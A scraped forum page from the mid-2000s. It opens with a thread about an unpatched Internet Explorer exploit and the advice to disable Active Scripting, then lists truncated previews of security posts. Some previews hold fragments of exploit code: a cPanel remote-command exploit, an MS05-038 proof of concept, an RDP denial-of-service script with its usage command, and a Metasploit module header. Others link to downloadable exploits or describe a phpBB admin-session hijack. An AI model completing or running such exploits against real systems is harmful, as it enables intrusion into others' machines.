For Internet Explorer users, please note that there is a new exploit in the wild that is capable of compromising a fully patched and updated WinXP machine:
Microsoft has not released a fix yet. From the article:
QUOTE
IE users should immediately disable Active Scripting via the Tools > Internet Options > Security tab > Custom Level feature.
Firefox and other alternative web browsers are not affected. You would have to be tricked into going to a malicious website to have any chance of being affected by this one, so most folks are probably safe anyway, but I thought I would let everybody know.
For the curious, here's a proof of concept site that launches MScalculator when you visit their web page. Scary!
It really bothers me how Internet Explorer has so many flaws. I mean they should take time to test it before releasing it to the general public. Its insane how it has been out for a few years and people are still finding exploits.
Disabling active scripting will disable javascript. I'm not sure exactly what the difference is between the two. You can see the 'Active scripting' option in the 'custom level' area of the security tab in internet options:
It's the top one in this image. Just set it to 'Disable'
I went to the ComputerTerrorism site and tried the test and yes it is scarey how well IE co-operates with the test. Not only that, it hung itself and stopped responding when I tried closing the test pop-up window. First I got the message that that program was not responding and then IE crashed.
I went into my security settings and disabled activeX scripting and ran the test again and.....nothing happened. Good!
However, ComputerTerrorists do go on to say that as long as you stay off potentially malicious websites, you won't have a problem. Yeah....right.
I forgot to add that my Calculator did not pop up. I was expecting it to.
Yeah, it's supposed to pop up calculator. It comes up after the pop up does it's thing, so if ie crashed in the middle of it that's probably why you didn't see it.
Nice thanks for that information. And the test like with an "javascript virus" is funny
lol tought that Internet Explorer was almost 100% safe, anyway its not any big problem its just an little exploit and microsoft will soon deliver an patch to fic that problem.
well heres a question if you disable the javascript through your browser are you not going to have problems loading sites and um using certain features like post (fast reply) and what not.
of course you would have to be stupid to be tricked into going to a phony website through your email.
but its simple delete/block junk email and your find and don't go to websites you don't know about without researching it first.
Well, here's another obvious reason why current IE users should switch to FireFox
I used to use IE a few months ago, but it just keeps getting more annoying everytime i use it. In the end, i decided to reformat my computer, forget about IE and use FireFox. And up till now, FireFox has served me well.
I disabled active scripting, but that made my Mcafee virus scanner stop working. So, i advise not to disable, but to "prompt". Good thing i have more than one virus scanner, eh?
Recently, I don't know when, I realized that my browser was opening some weird pages. It would
either open to what it seemed to be a valid webpage but it always looked the same. But the contents
will be text only but always with adult related links... so I was curious but never paid any
attention since these pages were coming up only when I mistyped an URL address. But the pages
popped up were always the same and it got me curious. So I started to click on refersh and see how
far it will lead. At the end, it led to a site called "SearchAtHand.com" After few minutes ...
Cpanel Exploit
- security hole in cPanel to hack the servers of a hosting company (8)
A pair days ago I read this new on Slashdot: cPanel Exploit Used to Circulate IE Exploit
QUOTE "In a dangerous combination of unpatched exploits, hackers have used a previously
undiscovered security hole in cPanel to hack the servers of a hosting company and use hundreds of
hijacked sites to infect Internet Explorer users with malware using the unpatched VML exploit.
cPanel, whose hosting automation software is used by many large hosting companies, has issued a fix.
It's a local exploit, meaning the attacker must control a cPanel account on the target hosti...
I just got a new laptop, and of course it's loaded with vista. Everything works awesomly!
(my last PC was from 2001, BIG DIFF.) But the damned thing compulsivly and automatically sets
Internet Explorer to my default browser and won't let me change certain things which browsers
will typically handle. 've manually changed it so Firefox handles all the stuff except HTTPS
and what not (CANNOT CHANGE W/O HACK!), but IE just bumps in every time I want to click a link
from a non-browser based file /sad.gif" style="vertical-align:middle" emoid=":(" border="...
On monday it was reported that Quicktime 7.2 and 7.3 versions come with a new exploit in which
malware could on to a person's computer through streaming videos. They only mention that XP and
Vista are the only affect systems and no word came about on the Mac operating system. They mention
that a buffer overflow bug was made in which it "contains a stack buffer overflow vulnerability in
the way Quicktime handles the RTSP Content-Type header." For those who don't know what RTSP is,
RTSP is the Real-Time Streaming Protocol which apple uses for its QuickTime softw...
Link to Article: http://news.com.com/Hackers+claim+zero-day..._3-6121608.html Thought this was
interesting. Really caught me offgaurd, didn't expect such a huge flaw on a GPL based program.
Whats even more scary is they said they have about 30 other flaws found......
A friend of mine was temporarily banned from the computers at my school a while ago after he
accidentially found a way into Task Manager, which is disabled on our network. He has had his
permissions restored now, but has no idea why he got banned in the first place. However, recently he
explained what he did to me, and I tested it. I soon found out that, by accident, we had both
discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
to do with network permissions. Windows XP recieves the permission data from the network as soon...
Browser Spy
- BrowserSpy can tell you all kinds of detailed information about you an (1)
/smile.gif" style="vertical-align:middle" emoid=":)" border="0" alt="smile.gif" /> Browser Spy
-------------------------- Wow, this makes me feel rather exposed..... a browser spy that can find
countless little bits of information, I'm sure something evil could be devised out of this.
And it's also not even one of those things that work only in IE (except for some of the
features). Take a look Browser Spy /cool.gif" style="vertical-align:middle" emoid="B)"
border="0" alt="cool.gif" /> have a nice day! ...
QUOTE Earlier this week, I blogged about a site doing a bunch of different exploits, depending
on what you are running. One of the things the site will do is detect if you have Firefox, and
attempt to exploit it, using the InstallVersion.compareTo() vulnerability. Read More with
images Already found to be copying and pasting. Take this time to review our forum rules. Warning. ...
SiteAdvisor - Firefox's Answer To IE's Phishing Filter? A site-warning plugin
for ie and firefox Name: Site Advisor Url: http://siteadvisor.com Download:
http://www.siteadvisor.com/download/ff.html Rating: 9.75/10 Improvements: Not all sites are on
their database but many of the popular ones are so index all webistes. SiteAdvisor is a simple and
easy to install extension created for firefox which checks to see if the site you are on is "bad"
from its database of urls. Once the results have reached your browser a notificatio...
QUOTE Windows users are being urged to scan their computers before 3rd February 2006 to avoid
falling victim to a destructive Worm. On that date the Nyxem E Worm is set to delete Word,
Powerpoint, Excel and Acrobat files on infected machines! Don't get caught out... See
complete article at http://www.updatexp.com/nyxem-e.html Better get your anti-virus updated by
3rd Febuary before seeing your files go missing. It's kindda scary worm if not handled properly.
The date is near so get updated fast. Edited topic title. ...
Which web browser do you use? Personally, I use Firefox 1.5. Firefox is from a trusted provider,
Mozilla. For more information on Mozilla, and if you want to download Firefox for your own computer,
visit either Mozilla.com or Mozilla.org. If you do not want to remember Mozilla, you can visit their
newly-obtained domain, firefox.com. You? Stephen...
Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution
vulnerability. /* cPanel */ //headers #include //In/Out #include //sockets functions
#include //memory functions #include //strlen,strcat,strcpy #pragma comment(lib,"ws2_32.lib")
//for compile with dev-c++ link to "libws2_32.lib" #define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data /*connect host:port*/ SOCKET Conecta(char
*Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//l...
In the wake of hurricane Katrina, several online scams have begun to circulate the Internet,
according to several security firms. Sophos warned users on Thursday not to open a malware-Infected
e-mail posing as news on the disaster. Possible subject lines of the e-mail could be QUOTE
"Re: g8 Tropical storm flooded New Orleans", "Re: g7 80 percent of our city underwater", and "Re:
q1 Katrina killed as many as 80 people". The group said there could be additional variants.
BetaNews on Thursday morning had received a variant of the above e-mails, however it app...
Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to
the forum. Even the admin account is not not secure with the default setup. Click Here for more
details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of
PHPbb and click here to download the latest version....
Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
/*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11
http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003 -----------------------------------------------*/ #include
#include #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm
_emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm
_emit 0x90\...
Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
This program is free software; you can redistribute it and/or modify it under // the terms of the
GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
s_block_start("packet_1...
## # This file is part of the Metasploit Framework and may be redistributed # according to the
licenses defined in the Authors field below. In the # case of an unknown or missing license, this
file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest #
version of the Framework can always be obtained from metasploit.com. ## package
Msf::Exploit::solaris_lpd_unlink; use base "Msf::Exploit"; use IO::Socket; use IO::Select; use
strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Solaris
LPD Arbit...
another internet explorer aecurity hole! /blink.gif' border='0' style='vertical-align:middle'
alt='blink.gif' /> here 's the exploit : http://www.milw0rm.com/id.php?id=1148 ...
wow, you can get this famous vulnerabilty exploit here: http://www.milw0rm.com/id.php?id=1149
have fun /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> ...
Recently, an exploit has been found out that allows people to use their cookies to gain access to
the ACP. And Firefox assists with it /ohmy.gif' border='0' style='vertical-align:middle'
alt='ohmy.gif' /> ! Basically what happens that is when you visitthe phpBB forum, it logs a
cookie containing your Session ID (Basically who and when you are). What it does, after much
decoding and encoding, is allows you to replace your SID with the admin's, thus enabling them to
gain access. To fix this, upgrade to the latest version of phpBB, 2.0.13. Dun dun dunnnnn! B...
Express your Opinions, Thoughts or Contribute your information that might help someone here.
Ask your Doubts & Queries to get answers.. "Together, We enlight each other!"
Register FREE for AD-FREE
forum, Create your own topics, Ask Questions, track topics, setup
subscriptions & notifications and Get a Free Website w/ Email and FTP.
